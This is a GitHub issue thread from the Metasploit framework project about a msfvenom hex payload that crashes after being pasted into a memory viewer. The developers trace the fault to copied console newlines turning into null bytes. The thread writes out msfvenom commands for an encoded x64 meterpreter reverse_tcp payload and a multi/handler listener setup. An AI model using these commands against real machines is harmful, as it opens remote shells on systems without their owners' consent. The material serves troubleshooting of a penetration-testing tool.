Metasploit-framework: msfvenom hex payload code error

Created on 5 May 2016 · 18 Comments · Source: rapid7/metasploit-framework

Video

https://youtu.be/6UfsPFapHSQ

-host option-

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set EXITFUNC thread

set exitonsession false

set lhost 192.168.0.2

set lport 443

exploit -j

-msfvenom option-

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor -b '\x00' -i 3 LHOST=192.168.0.2 LPORT=443 -f hex

TEST OS:
Windows 7 x64 metasploit-framework Version(4.11.26)

msfconsole -> C:\metasploit-framework\bin\msfconsole.bat
msfvenom -> C:\metasploit-framework\bin\msfvenom.bat

payload information
platform: windows/x64/meterpreter/reverse_tcp
Host: 192.168.0.2
port: 443
encoder:x64/xor
payload hex del: x00
i loop : 3

-msfvenom hex information-

4.11.20 version payload hex no crash

Payload size: 631 bytes (no bug)


4.11.26 version payload hex crash

Payload size: 631 bytes


bug msfvenom


All 18 comments

Sorry, your video and description do not say how you are launching the payload at all. I see some sort of 'memory viewer' console, where you appear to be pasting things, and jumping to an offset. Can you please provide steps that we can reproduce?

kali linux msfvenom -> hex code generator -> no bug

windows msfvenom -> hex code generator -> bug

windows test msfvenom

http://windows.metasploit.com/metasploitframework-latest.msi

Hi @kainpark7894, when you executed the 4.11.20 payload, were you also using Framework 4.11.20? Or were you using 4.11.26 as you said earlier?

my bad test -> 4.1.1.20 -> kali linux msfvenom
(Windows msfvenom hex generator bug?)

linux msfvenom hex generator no bug

OK, thanks for the information.

By the way, thanks for trying to communicate in English. But if you want, you can speak Korean. We can translate with Google :-)

How did you copy the hex output? Did you write it to a file, or try to copy from the console output in the cmd window? I wonder if not all of the characters got copied when you selected it accidentally.

@bcook-r7 The video shows he right-clicked on the hex payload from this Github issue to copy, and then pasted to Memory Viewer.

When I copied from your output above, the non-working one has linefeeds between each line, but the working one is a single continuous line. There is also a difference of 16 bytes between them. This makes me think the copy/paste method you are using is adding some extra characters to the payload when you paste it.

$ wc good.txt  
       1       1    1263 b.txt
$ wc bad.txt  
      16      16    1278 a.txt

Ah good one.

[screenshot: screenshot_20160510-015657]

See my screenshot. Not sure if cheat engine will automatically ignore the new lines.

I'm pretty sure it does?

The shell code looks the same other than the line feeds. -> nvm edit: shell code is different.

I did a quick diff in HXD and it looks quite different. What I don't get is, if it's XOR'd with \x00 then it should have same shell code. The stub remains the same though.

His working: https://www.onlinedisassembler.com/odaweb/E7FmQDHs/0

His not working: https://www.onlinedisassembler.com/odaweb/m1CU6tnW/0

I'll test it out right quick....

Ahh yup, @bcook-r7 you might be right. When there is a newline, Memory Viewer/Cheat Engine treats that as a null byte.

The following screenshot is what the hex output actually looks like. I copied from this Github issue (the bad hex payload):

[screenshot: screen shot 2016-05-09 at 8 14 27 pm]

Pay attention to the last couple of bytes in the first line. We are gonna try to find that in Memory Viewer:

[screenshot: screen shot 2016-05-09 at 8 17 30 pm]

Notice in Memory Viewer, there is a null byte (00) between B5 and E2. That null byte should NOT be there.

I generated the exact same thing with the latest msfvenom, and there is no beautification, so looks like there is no problem with Framework. However, this was done on OS X, I don't know if Windows does anything different (and that's what @kainpark7894 used)

Ok, so I tried to generate the same payload on Windows:

[screenshot: screen shot 2016-05-09 at 8 40 18 pm]

And if you select the output, right click, and paste it on a text editor, it looks like this:

[screenshot: screen shot 2016-05-09 at 8 41 37 pm]

@kainpark7894 When using msfvenom on Windows, did you copy the hex payload from the command prompt? If you did, that's the problem.

To work around that, do:

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor -b '\x00' -i 3 LHOST=192.168.0.2 LPORT=443 -f hex -o payload.txt

The hex payload saved as payload.txt will not have any newlines (null bytes). See if that fixes your problem :-)
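The diagnosis above (a line break pasted into the hex viewer becomes a 00 byte, and the decoded blob grows by one byte per line) as an added example, not code from the thread or from Metasploit: a small Python check that reproduces the failure on a constructed hex sample and shows the validation a practitioner would run before using a hex dump. The sample bytes and EXPECTED_SIZE are made up for the example; the 0x00 check relies on the payload having been generated with -b '\x00', as in the issue.

```python
import re

# Constructed sample: 8 bytes as msfvenom -f hex would print them, but copied
# from a console that inserted a newline after every 4 bytes.  Not the payload
# from the issue; the bytes are made up for this example.
COPIED_HEX = "4831c948\n81e9b6ff\n"
EXPECTED_SIZE = 8  # assumed "Payload size: N bytes" line for this sample

HEXDIGITS = set("0123456789abcdefABCDEF")


def naive_paste(text: str) -> bytes:
    """Emulate a memory viewer that accepts pasted text character by character
    and turns anything that is not a hex pair into a 0x00 byte.  This is the
    behaviour described in the thread: each newline becomes one null byte."""
    out = bytearray()
    i = 0
    while i < len(text):
        if text[i] in HEXDIGITS and i + 1 < len(text) and text[i + 1] in HEXDIGITS:
            out.append(int(text[i:i + 2], 16))
            i += 2
        else:
            out.append(0)  # newline (or any stray character) -> null byte
            i += 1
    return bytes(out)


def null_offsets(data: bytes) -> list:
    """Offsets of 0x00 bytes; for a -b '\\x00' payload these are corruption."""
    return [i for i, b in enumerate(data) if b == 0]


def load_hex_payload(text: str, expected_size: int) -> bytes:
    """Strict loader: strip all whitespace, require pure hex, and check the
    decoded length against the size msfvenom reported.  Because the payload
    was encoded with -b '\\x00', any null byte means the transfer mangled it."""
    cleaned = re.sub(r"\s+", "", text)
    if not re.fullmatch(r"(?:[0-9a-fA-F]{2})*", cleaned):
        raise ValueError("non-hex characters or odd digit count in dump")
    data = bytes.fromhex(cleaned)
    if len(data) != expected_size:
        raise ValueError(f"decoded {len(data)} bytes, expected {expected_size}")
    if null_offsets(data):
        raise ValueError(f"null bytes at {null_offsets(data)} despite -b '\\x00'")
    return data


if __name__ == "__main__":
    bad = naive_paste(COPIED_HEX)
    print(len(bad), "bytes via naive paste, nulls at", null_offsets(bad))
    print(load_hex_payload(COPIED_HEX, EXPECTED_SIZE).hex(), "after stripping")
```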

Yeah, we don't have a lot of control over how cmd.exe handles copy/paste. I think you even get different results on Windows 10's console vs. earlier versions of windows.

wchen-r7 thank you

cmd console -hex bug ?

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor -b '\x00' -i 3 LHOST=192.168.0.2 LPORT=443 -f hex -o test.txt


////////////////////////////////////
i solve a problem

Darn hexbugs
